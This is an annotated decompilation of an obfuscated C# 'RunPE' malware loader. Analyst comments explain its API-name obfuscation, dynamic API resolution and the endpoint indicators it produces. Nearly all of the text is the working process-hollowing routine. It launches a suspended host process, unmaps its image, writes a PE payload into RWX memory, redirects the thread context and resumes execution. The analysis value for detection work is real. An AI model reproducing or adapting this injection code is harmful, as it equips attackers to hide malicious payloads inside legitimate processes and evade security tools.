// Warning: Some assembly references could not be resolved automatically. This might lead to incorrect decompilation of some parts,
// for ex. property getter/setter access. To get optimal decompilation results, please manually add the missing references to the list of loaded assemblies.
// runpe, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// order.yes
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using order;

// Analyst notes (decompiled, control-flow-flattened sample; the assembly identity above is "runpe").
//
// What the visible code does: it starts the executable at `path` as a suspended child process,
// replaces that process's image with the PE file held in `payload`, redirects the main thread's
// context to the new entry point and resumes the thread. This is the process-hollowing (RunPE)
// pattern.
//
// Static indicators visible in this listing:
//   * Win32/NT API and DLL names are stored reversed in one '|'-separated literal (string_0) and
//     un-reversed at run time by smethod_0, so plain string searches for the API names miss them;
//     searching for the reversed forms works.
//   * APIs are bound through LoadLibraryA/GetProcAddress + Marshal.GetDelegateForFunctionPointer
//     rather than [DllImport], so only those two imports show up as P/Invoke declarations.
//   * "System.BitConverter"/"ToInt32" are also stored reversed and called through reflection.
//
// Behavioural indicators (what endpoint telemetry would see from the calls below):
//   * CreateProcessA with creation flags 134217732 (0x08000004 = CREATE_SUSPENDED | CREATE_NO_WINDOW);
//   * ZwUnmapViewOfSection on the child, VirtualAllocEx with 12288/64
//     (MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE), several WriteProcessMemory calls;
//   * Get/SetThreadContext (or the Wow64 variants) followed by ResumeThread.
//
// The `switch ((state ^ const) % n)` loops are obfuscator-generated dispatchers. The order in which
// the cases run is fixed by the state constants and was NOT traced for these notes; comments on
// individual cases describe only what that case does.
public static class yes
{
    // Delegate signatures for the dynamically resolved APIs. The API each one is bound to is
    // established in the static constructor; see the mapping comments there.
    private delegate int Delegate0(IntPtr handle);
    private delegate bool Delegate1(IntPtr thread, int[] context);
    private delegate bool Delegate2(IntPtr thread, int[] context);
    private delegate bool Delegate3(IntPtr thread, int[] context);
    private delegate bool Delegate4(IntPtr thread, int[] context);
    private delegate int Delegate5(IntPtr handle, int address, int length, int type, int protect);
    private delegate bool Delegate6(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
    private delegate bool Delegate7(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
    private delegate int Delegate8(IntPtr process, int baseAddress);
    private delegate bool Delegate9(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref Struct1 startupInfo, ref Struct0 processInformation);

    // Passed as the processInformation argument of Delegate9 (CreateProcessA). From its use in
    // Execute: intptr_0 is handed to the process-level calls, intptr_1 to the thread-level calls,
    // and uint_0 to Process.GetProcessById. Layout is consistent with PROCESS_INFORMATION.
    [StructLayout(LayoutKind.Sequential, Pack = 1)]
    private struct Struct0
    {
        public readonly IntPtr intptr_0;
        public readonly IntPtr intptr_1;
        public readonly uint uint_0;
        private readonly uint uint_1;
    }

    // Passed as the startupInfo argument of Delegate9; only uint_0 is set (to the marshalled size
    // of the struct). Layout is consistent with STARTUPINFO, with the 36-byte array standing in
    // for the fields between the title pointer and the reserved pointer.
    [StructLayout(LayoutKind.Sequential, Pack = 1)]
    private struct Struct1
    {
        public uint uint_0;
        private readonly string string_0;
        private readonly string string_1;
        private readonly string string_2;
        [MarshalAs(UnmanagedType.ByValArray, SizeConst = 36)]
        private readonly byte[] byte_0;
        private readonly IntPtr intptr_0;
        private readonly IntPtr intptr_1;
        private readonly IntPtr intptr_2;
        private readonly IntPtr intptr_3;
    }

    // Reversed names, split on '|'. After reversal by smethod_0 the entries read:
    //   [0] kernel32  [1] ntdll  [2] ResumeThread  [3] Wow64SetThreadContext  [4] SetThreadContext
    //   [5] Wow64GetThreadContext  [6] GetThreadContext  [7] VirtualAllocEx  [8] WriteProcessMemory
    //   [9] ReadProcessMemory  [10] ZwUnmapViewOfSection  [11] CreateProcessA  [12] "" (trailing '|')
    private static string[] string_0 = Convert.ToString("23lenrek|lldtn|daerhTemuseR|txetnoCdaerhTteS46woW|txetnoCdaerhTteS|txetnoCdaerhTteG46woW|txetnoCdaerhTteG|xEcollAlautriV|yromeMssecorPetirW|yromeMssecorPdaeR|noitceSfOweiVpamnUwZ|AssecorPetaerC|").Split(new string[1] { "|" }, StringSplitOptions.None);

    // Still-reversed copies of string_0[0..11], assigned in the static constructor.
    private static string string_1;
    private static string string_2;
    private static string string_3;
    private static string string_4;
    private static string string_5;
    private static string string_6;
    private static string FmffedpoU;
    private static string string_7;
    private static string string_8;
    private static string string_9;
    private static string string_10;
    private static string string_11;

    // Resolved API entry points, assigned in the static constructor.
    private static readonly Delegate0 delegate0_0;
    private static readonly Delegate1 delegate1_0;
    private static readonly Delegate2 delegate2_0;
    private static readonly Delegate3 delegate3_0;
    private static readonly Delegate4 delegate4_0;
    private static readonly Delegate5 delegate5_0;
    private static readonly Delegate6 delegate6_0;
    private static readonly Delegate7 delegate7_0;
    private static readonly Delegate8 delegate8_0;
    private static readonly Delegate9 delegate9_0;

    /// <summary>
    /// String de-obfuscator: builds a new string by appending the characters of
    /// <paramref name="string_12"/> from the last index down to 0, i.e. returns the input reversed.
    /// </summary>
    /// <param name="string_12">Reversed name taken from string_0 or an inline literal.</param>
    /// <returns>The reversed copy of the input.</returns>
    private static string smethod_0(string string_12)
    {
        string result = default(string);
        string text = default(string);
        bool flag = default(bool);
        int num3 = default(int);
        while (true)
        {
            int num = -182621391;
            while (true)
            {
                uint num2;
                switch ((num2 = (uint)num ^ 0xAA142A05u) % 10u)
                {
                case 9u: result = text; num = (int)((num2 * 1468303116) ^ 0x49C44C8); continue;
                case 8u: num = (int)(num2 * 1126234823) ^ -1975236799; continue;
                // Loop test: branches on whether an index remains (flag set in case 2).
                case 7u: { int num4; int num5; if (flag) { num4 = 2092358217; num5 = 2092358217; } else { num4 = 1378074789; num5 = 1378074789; } num = num4 ^ (int)(num2 * 1000400265); continue; }
                // Initialise the output and start at the last character.
                case 6u: text = ""; num3 = string_12.Length - 1; num = (int)((num2 * 1805398699) ^ 0x1597BD27); continue;
                case 5u: num = ((int)num2 * -1054755974) ^ 0x6F009764; continue;
                // Append the current character and step backwards.
                case 4u: text += string_12[num3]; num3--; num = ((int)num2 * -956446027) ^ -1540841963; continue;
                case 3u: num = -2134886613; continue;
                case 2u: flag = num3 >= 0; num = -1560971266; continue;
                case 0u: break;
                default: return result;
                }
                break;
            }
        }
    }

    // The only two statically declared imports; every other API is reached through them.
    [DllImport("kernel32", SetLastError = true)]
    private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string string_12);

    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
    private static extern IntPtr GetProcAddress(IntPtr intptr_0, [MarshalAs(UnmanagedType.VBByRefStr)] ref string string_12);

    /// <summary>
    /// Dynamic API resolver: LoadLibraryA(object_0) then GetProcAddress(module, object_1), and the
    /// resulting pointer is wrapped with Marshal.GetDelegateForFunctionPointer as a T.
    /// </summary>
    // NOTE(review): T has no visible type-parameter list here and the call sites pass no type
    // argument; presumably the "<...>" parts were lost in decompilation/extraction. The
    // `ref *(string*)(&object_0)` casts are decompiler output for by-ref string marshalling.
    // The trailing dispatcher loop only returns `result`.
    private unsafe static T smethod_1(object object_0, object object_1)
    {
        T result = (T)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref *(string*)(&object_0)), ref *(string*)(&object_1)), typeof(T));
        while (true)
        {
            int num = -1141402450;
            while (true)
            {
                uint num2;
                switch ((num2 = (uint)num ^ 0xDEAB2CFFu) % 3u)
                {
                case 2u: goto IL_0025;
                case 0u: break;
                default: return result;
                }
                break;
                IL_0025:
                num = (int)(num2 * 1189493330) ^ -684938926;
            }
        }
    }

    /// <summary>
    /// Starts <paramref name="path"/> suspended and overwrites its image with the PE file in
    /// <paramref name="payload"/>, then resumes it (process hollowing).
    /// </summary>
    /// <param name="path">Executable passed as applicationName to CreateProcessA (the host process).</param>
    /// <param name="payload">Raw bytes of the PE image to place into the host. Read at fixed
    /// header offsets with no bounds checks visible in this method.</param>
    // The outer dispatcher compares the attempt counter num2 with 5 and increments it after the
    // catch block, so the whole sequence appears to be retried up to five times on failure.
    // All addresses are handled as 32-bit ints and the thread context is a 179-int (716-byte)
    // array, so the routine is written for a 32-bit target image.
    public static void Execute(string path, byte[] payload)
    {
        uint num = 420596485u;
        int num2 = 0;                       // attempt counter
        bool flag4 = default(bool);
        int num7 = default(int);            // base address the payload is written to in the child
        int bufferSize = default(int);      // payload[num16 + 84]: SizeOfHeaders in a PE32 optional header
        bool flag17 = default(bool);
        int[] array = default(int[]);       // thread CONTEXT as raw ints
        bool flag3 = default(bool);
        bool flag15 = default(bool);
        bool flag11 = default(bool);
        bool flag16 = default(bool);
        int num40 = default(int);           // section header +16: SizeOfRawData
        int num33 = default(int);           // offset of the current section header in payload
        int srcOffset = default(int);       // section header +20: PointerToRawData
        int num19 = default(int);           // section header +12: VirtualAddress
        int num15 = default(int);           // payload[num16 + 52]: ImageBase
        int length = default(int);          // payload[num16 + 80]: SizeOfImage
        int num9 = default(int);            // array[41] of the context (Ebx slot in an x86 CONTEXT)
        int buffer = default(int);          // 4 bytes read from the child at num9 + 8
        int num16 = default(int);           // payload[60]: e_lfanew, offset of the PE header
        byte[] array2 = default(byte[]);    // raw bytes of the current section
        bool flag12 = default(bool);
        bool flag6 = default(bool);
        int num14 = default(int);           // payload[num16 + 40]: AddressOfEntryPoint
        bool flag7 = default(bool);
        bool flag9 = default(bool);
        short num26 = default(short);       // payload[num16 + 6]: NumberOfSections
        int num25 = default(int);           // section loop index
        bool flag8 = default(bool);
        bool flag10 = default(bool);
        bool flag13 = default(bool);
        bool flag14 = default(bool);
        bool flag5 = default(bool);
        while (true)
        {
            bool flag = num2 < 5;
            int num3 = 9848796;
            while (true)
            {
                switch ((num = (uint)num3 ^ 0x3E0691EFu) % 5u)
                {
                case 3u: num2++; num3 = 170510366; continue;
                case 2u: num3 = 171826151; continue;
                case 1u:
                {
                    if (!flag) { num3 = ((int)num * -800578150) ^ 0x5CACF755; continue; }
                    int bytesWritten = 0;
                    Struct1 startupInfo = default(Struct1);
                    Struct0 processInformation = default(Struct0);
                    startupInfo.uint_0 = Convert.ToUInt32(Marshal.SizeOf(typeof(Struct1)));
                    try
                    {
                        // CreateProcessA(path, "", ..., 0x08000004 = CREATE_SUSPENDED | CREATE_NO_WINDOW).
                        // A windowless child created suspended by a .NET process is the first
                        // observable event of the sequence.
                        bool flag2 = !delegate9_0(path, string.Empty, IntPtr.Zero, IntPtr.Zero, inheritHandles: false, 134217732u, IntPtr.Zero, null, ref startupInfo, ref processInformation);
                        while (true)
                        {
                            int num4 = 2138586973;
                            while (true)
                            {
                                // Cases that only assign num4 are dispatcher transitions with no
                                // other effect. The `throw new Exception()` cases are reached on
                                // failure paths and hand control to the bare catch below.
                                switch ((num = (uint)num4 ^ 0x3E0691EFu) % 76u)
                                {
                                case 75u: { int num10; int num11; if (flag4) { num10 = -555776695; num11 = -555776695; } else { num10 = -758921288; num11 = -758921288; } num4 = num10 ^ ((int)num * -1091942078); continue; }
                                // Branch on the CreateProcessA result.
                                case 74u: { int num29; int num30; if (!flag2) { num29 = -310899580; num30 = -310899580; } else { num29 = -1941287759; num30 = -1941287759; } num4 = num29 ^ (int)(num * 1344981982); continue; }
                                // WriteProcessMemory: first bufferSize bytes of payload (the PE headers) to num7.
                                case 73u: { int num8; if (delegate6_0(processInformation.intptr_0, num7, payload, bufferSize, ref bytesWritten)) { num4 = 546117217; num8 = 546117217; } else { num4 = 1277841475; num8 = 1277841475; } continue; }
                                // Wow64GetThreadContext on the child's main thread.
                                case 72u: flag17 = !delegate3_0(processInformation.intptr_1, array); num4 = (int)((num * 1366839287) ^ 0x10ABCC1E); continue;
                                case 71u: num4 = (int)(num * 1924060960) ^ -955226800; continue;
                                // SetThreadContext with the modified context.
                                case 70u: flag3 = delegate2_0(processInformation.intptr_1, array); num4 = (int)((num * 1286461066) ^ 0x29C2C38A); continue;
                                case 69u: { int num38; int num39; if (flag15) { num38 = -1726399991; num39 = -1726399991; } else { num38 = -160229496; num39 = -160229496; } num4 = num38 ^ (int)(num * 534159826); continue; }
                                case 67u: { int num23; int num24; if (flag11) { num23 = 1929860551; num24 = 1929860551; } else { num23 = 935202474; num24 = 935202474; } num4 = num23 ^ (int)(num * 1052223104); continue; }
                                case 66u: { int num45; int num46; if (flag16) { num45 = 2053309107; num46 = 2053309107; } else { num45 = 1075251106; num46 = 1075251106; } num4 = num45 ^ (int)(num * 522527451); continue; }
                                case 65u: num4 = (int)((num * 2082113967) ^ 0x41D05A3A); continue;
                                // Section header: raw size and file offset; branches on a zero raw size.
                                case 63u: { num40 = BitConverter.ToInt32(payload, num33 + 16); srcOffset = BitConverter.ToInt32(payload, num33 + 20); int num41; int num42; if (num40 == 0) { num41 = -2044314112; num42 = -2044314112; } else { num41 = -1744183728; num42 = -1744183728; } num4 = num41 ^ (int)(num * 2111148972); continue; }
                                // Section header: virtual address (RVA) of the section.
                                case 62u: num19 = BitConverter.ToInt32(payload, num33 + 12); num4 = 1948841968; continue;
                                // VirtualAllocEx in the child at the payload's ImageBase, SizeOfImage bytes,
                                // 12288 = MEM_COMMIT|MEM_RESERVE, 64 = PAGE_EXECUTE_READWRITE. A remote RWX
                                // allocation is a strong behavioural signal.
                                case 61u: num7 = delegate5_0(processInformation.intptr_0, num15, length, 12288, 64); flag15 = num7 == 0; num4 = ((int)num * -2142491794) ^ -1012446892; continue;
                                // Context slot 41 (Ebx in an x86 CONTEXT); presumably the PEB address of the
                                // suspended child, given the +8 reads/writes below.
                                case 60u: num9 = array[41]; buffer = 0; num4 = 1169712234; continue;
                                // PE header offset (e_lfanew at 60) and the payload's preferred ImageBase.
                                case 59u: num16 = BitConverter.ToInt32(payload, 60); num15 = BitConverter.ToInt32(payload, num16 + 52); num4 = 1755343267; continue;
                                // First section header: PE header + 248 (PE32 layout).
                                case 58u: num33 = num16 + 248; num4 = 207587741; continue;
                                case 56u: num4 = (int)((num * 343819984) ^ 0x37232ED2); continue;
                                // Copy the section's raw bytes out of payload.
                                case 55u: Buffer.BlockCopy(payload, srcOffset, array2, 0, array2.Length); num4 = ((int)num * -258135312) ^ -1194031149; continue;
                                case 54u: { int num21; int num22; if (flag12) { num21 = -254206099; num22 = -254206099; } else { num21 = -1950557060; num22 = -1950557060; } num4 = num21 ^ (int)(num * 310431002); continue; }
                                // Does the payload's ImageBase equal the value read from the child at num9 + 8?
                                case 53u: flag12 = num15 == buffer; num4 = 2059910541; continue;
                                // WriteProcessMemory: section bytes to base + section RVA.
                                case 52u: flag11 = !delegate6_0(processInformation.intptr_0, num7 + num19, array2, array2.Length, ref bytesWritten); num4 = ((int)num * -1995308707) ^ 0x33BF0E60; continue;
                                case 51u: num4 = ((int)num * -1209566208) ^ 0x671ABF78; continue;
                                // WriteProcessMemory: store the new base (4 bytes) at num9 + 8 in the child.
                                case 49u: { byte[] bytes = BitConverter.GetBytes(num7); flag6 = !delegate6_0(processInformation.intptr_0, num9 + 8, bytes, 4, ref bytesWritten); num4 = (int)(num * 1085410340) ^ -1431397662; continue; }
                                case 48u: num4 = (int)(num * 319170225) ^ -500106916; continue;
                                // Context slot 44 (Eax in an x86 CONTEXT) = new base + entry-point RVA.
                                // flag7 presumably selects the native vs Wow64 SetThreadContext path.
                                case 46u: array[44] = num7 + num14; flag7 = IntPtr.Size == 4; num4 = 495542227; continue;
                                // ReadProcessMemory: 4 bytes at num9 + 8 in the child into `buffer`.
                                case 45u: flag4 = !delegate7_0(processInformation.intptr_0, num9 + 8, ref buffer, 4, ref bytesWritten); num4 = (int)(num * 246766094) ^ -111200186; continue;
                                // Reflection call equivalent to System.BitConverter.ToInt32(payload, num16 + 40)
                                // (names un-reversed by smethod_0): the entry-point RVA.
                                // NOTE(review): GetMethod by name alone presumably relies on ToInt32 having a
                                // single overload in the targeted runtime - confirm when sandboxing.
                                case 44u: { num14 = (int)Type.GetType(smethod_0("retrevnoCtiB.metsyS")).GetMethod(smethod_0("23tnIoT")).Invoke(0, new object[2] { payload, num16 + 40 }); int num47; if (!flag9) { num4 = 148363145; num47 = 148363145; } else { num4 = 1765105466; num47 = 1765105466; } continue; }
                                case 43u: num4 = (int)(num * 75498693) ^ -1196846372; continue;
                                // Number of sections; reset the section loop index.
                                case 42u: num26 = BitConverter.ToInt16(payload, num16 + 6); num25 = 0; num4 = ((int)num * -470712019) ^ -1118933175; continue;
                                case 41u: num4 = 280844244; continue;
                                case 40u: array2 = new byte[num40]; num4 = ((int)num * -1781729487) ^ 0x17C93618; continue;
                                // Advance to the next 40-byte section header.
                                case 39u: num33 += 40; num4 = 2044529839; continue;
                                case 38u: num4 = 255491121; continue;
                                case 37u: { int num43; int num44; if (!flag17) { num43 = 1427440187; num44 = 1427440187; } else { num43 = 1746870546; num44 = 1746870546; } num4 = num43 ^ ((int)num * -1658400894); continue; }
                                case 35u: num25++; num4 = ((int)num * -654607310) ^ -32765852; continue;
                                case 34u: num4 = ((int)num * -2075671707) ^ 0x30DA7DA1; continue;
                                case 33u: flag16 = !flag8; num4 = ((int)num * -1347058607) ^ 0x31A97F34; continue;
                                case 32u: { int num36; int num37; if (!flag10) { num36 = 1309453283; num37 = 1309453283; } else { num36 = 661070712; num37 = 661070712; } num4 = num36 ^ (int)(num * 972096574); continue; }
                                case 31u: num4 = 1745416750; continue;
                                // Size of the PE headers to copy.
                                case 30u: bufferSize = BitConverter.ToInt32(payload, num16 + 84); num4 = (int)((num * 2042500000) ^ 0x3AB3205B); continue;
                                case 29u: num4 = 2091610909; continue;
                                case 27u: { int num34; int num35; if (flag13) { num34 = -679438544; num35 = -679438544; } else { num34 = -1354518949; num35 = -1354518949; } num4 = num34 ^ (int)(num * 400178471); continue; }
                                case 26u: num4 = (int)(num * 822239013) ^ -1542997511; continue;
                                case 25u: { int num31; int num32; if (flag14) { num31 = 1726945517; num32 = 1726945517; } else { num31 = 1527467099; num32 = 1527467099; } num4 = num31 ^ (int)(num * 1166423359); continue; }
                                case 24u: { int num27; int num28; if (flag7) { num27 = -897120649; num28 = -897120649; } else { num27 = -810575483; num28 = -810575483; } num4 = num27 ^ ((int)num * -276469320); continue; }
                                // ZwUnmapViewOfSection (ntdll) on the address read from the child; non-zero
                                // return (an NTSTATUS other than success) sets flag14.
                                case 22u: flag14 = delegate8_0(processInformation.intptr_0, buffer) != 0; num4 = ((int)num * -1988474565) ^ 0x14D169B0; continue;
                                // Section loop condition.
                                case 21u: flag13 = num25 < num26; num4 = 1032740728; continue;
                                case 19u: num4 = 1694639061; continue;
                                // ResumeThread on the child's main thread; -1 is the failure value.
                                case 18u: { int num20; if (delegate0_0(processInformation.intptr_1) != -1) { num4 = 1839625070; num20 = 1839625070; } else { num4 = 1478473225; num20 = 1478473225; } continue; }
                                case 17u: { int num17; int num18; if (flag6) { num17 = 393459233; num18 = 393459233; } else { num17 = 1533830560; num18 = 1533830560; } num4 = num17 ^ ((int)num * -1664300021); continue; }
                                // 179 ints = 716 bytes (size of an x86 CONTEXT); slot 0 = 65538 (0x10002,
                                // CONTEXT_INTEGER on x86). flag10 presumably selects native vs Wow64
                                // GetThreadContext.
                                case 16u: array = new int[179]; array[0] = 65538; flag10 = IntPtr.Size == 4; num4 = (int)((num * 383371919) ^ 0x6B40FF87); continue;
                                // Size of the image to allocate in the child.
                                case 15u: length = BitConverter.ToInt32(payload, num16 + 80); num4 = 14376677; continue;
                                case 12u: flag9 = false; num4 = (int)((num * 1709570113) ^ 0x50807786); continue;
                                // Wow64SetThreadContext with the modified context.
                                case 9u: flag8 = delegate1_0(processInformation.intptr_1, array); num4 = (int)(num * 765118100) ^ -541404538; continue;
                                case 8u: num4 = ((int)num * -406620368) ^ 0x79C93759; continue;
                                case 6u: num4 = 1980862263; continue;
                                case 5u: num7 = num15; num4 = ((int)num * -609978053) ^ 0x45F08F9E; continue;
                                case 4u: { int num12; int num13; if (flag5) { num12 = 57826020; num13 = 57826020; } else { num12 = 1342290965; num13 = 1342290965; } num4 = num12 ^ ((int)num * -177645226); continue; }
                                // GetThreadContext on the child's main thread.
                                case 3u: flag5 = !delegate4_0(processInformation.intptr_1, array); num4 = ((int)num * -965880726) ^ -1403610731; continue;
                                case 2u: num4 = 261389518; continue;
                                case 1u: { int num5; int num6; if (flag3) { num5 = 613694821; num6 = 613694821; } else { num5 = 1134960697; num6 = 1134960697; } num4 = num5 ^ ((int)num * -367296803); continue; }
                                case 0u: num4 = 1284003431; continue;
                                default: return;
                                case 7u: break;
                                case 10u: throw new Exception();
                                case 11u: throw new Exception();
                                case 13u: throw new Exception();
                                case 14u: throw new Exception();
                                case 20u: throw new Exception();
                                case 23u: throw new Exception();
                                case 28u: throw new Exception();
                                case 36u: throw new Exception();
                                case 47u: throw new Exception();
                                case 57u: throw new Exception();
                                case 64u: throw new Exception();
                                case 68u: throw new Exception();
                                case 50u: return;
                                }
                                break;
                            }
                        }
                    }
                    // Bare catch: any failure above ends here. The half-prepared child is killed by
                    // process id, then control falls to `goto case 3u`, which increments the attempt
                    // counter. Short-lived suspended children that are terminated by their parent
                    // are therefore an expected side effect of failed attempts.
                    catch
                    {
                        while (true)
                        {
                            IL_0a60:
                            int num48 = 557689566;
                            while (true)
                            {
                                switch ((num = (uint)num48 ^ 0x3E0691EFu) % 4u)
                                {
                                case 2u: Process.GetProcessById(Convert.ToInt32(processInformation.uint_0)).Kill(); num48 = ((int)num * -1614415938) ^ -1758910881; continue;
                                case 1u: num48 = (int)((num * 2024828304) ^ 0x7BE8D8C9); continue;
                                default: goto end_IL_0a3e;
                                case 3u: break;
                                case 0u: goto end_IL_0a3e;
                                }
                                goto IL_0a60;
                                continue;
                                end_IL_0a3e:
                                break;
                            }
                            break;
                        }
                    }
                    goto case 3u;
                }
                default: return;
                case 4u: break;
                case 0u: return;
                }
                break;
            }
        }
    }

    // Static constructor: copies the reversed names out of string_0 and binds each delegate via
    // smethod_1(module, export) after un-reversing both with smethod_0. Resulting bindings:
    //   delegate0_0 = kernel32!ResumeThread           delegate5_0 = kernel32!VirtualAllocEx
    //   delegate1_0 = kernel32!Wow64SetThreadContext  delegate6_0 = kernel32!WriteProcessMemory
    //   delegate2_0 = kernel32!SetThreadContext       delegate7_0 = kernel32!ReadProcessMemory
    //   delegate3_0 = kernel32!Wow64GetThreadContext  delegate8_0 = ntdll!ZwUnmapViewOfSection
    //   delegate4_0 = kernel32!GetThreadContext       delegate9_0 = kernel32!CreateProcessA
    // Because binding happens here, the APIs are resolved the first time the type is touched,
    // before Execute runs.
    static yes()
    {
        while (true)
        {
            int num = -669095907;
            while (true)
            {
                uint num2;
                switch ((num2 = (uint)num ^ 0xA2DFA7B0u) % 12u)
                {
                case 11u: delegate0_0 = smethod_1(smethod_0(string_1), smethod_0(string_3)); num = (int)((num2 * 92770233) ^ 0x10161F50); continue;
                case 9u: delegate6_0 = smethod_1(smethod_0(string_1), smethod_0(string_8)); num = ((int)num2 * -1825288037) ^ 0xB827F41; continue;
                case 8u: delegate3_0 = smethod_1(smethod_0(string_1), smethod_0(string_6)); delegate4_0 = smethod_1(smethod_0(string_1), smethod_0(FmffedpoU)); delegate5_0 = smethod_1(smethod_0(string_1), smethod_0(string_7)); num = (int)(num2 * 202899740) ^ -1512637915; continue;
                case 7u: delegate1_0 = smethod_1(smethod_0(string_1), smethod_0(string_4)); delegate2_0 = smethod_1(smethod_0(string_1), smethod_0(string_5)); num = ((int)num2 * -482628099) ^ -1070131217; continue;
                case 6u: string_6 = string_0[5]; FmffedpoU = string_0[6]; string_7 = string_0[7]; num = ((int)num2 * -1292594128) ^ 0x5E51E282; continue;
                case 5u: string_1 = string_0[0]; num = (int)(num2 * 34292714) ^ -2084840839; continue;
                case 3u: string_2 = string_0[1]; num = ((int)num2 * -837643027) ^ 0x15FA1A32; continue;
                case 2u: string_8 = string_0[8]; string_9 = string_0[9]; string_10 = string_0[10]; string_11 = string_0[11]; num = (int)((num2 * 1110115946) ^ 0xDD8DE5B); continue;
                case 1u: string_3 = string_0[2]; string_4 = string_0[3]; num = (int)((num2 * 749911345) ^ 0x131CE6FD); continue;
                case 0u: string_5 = string_0[4]; num = (int)((num2 * 1201080651) ^ 0x982FFC2); continue;
                case 4u: break;
                default: delegate7_0 = smethod_1(smethod_0(string_1), smethod_0(string_9)); delegate8_0 = smethod_1(smethod_0(string_2), smethod_0(string_10)); delegate9_0 = smethod_1(smethod_0(string_1), smethod_0(string_11)); return;
                }
                break;
            }
        }
    }
}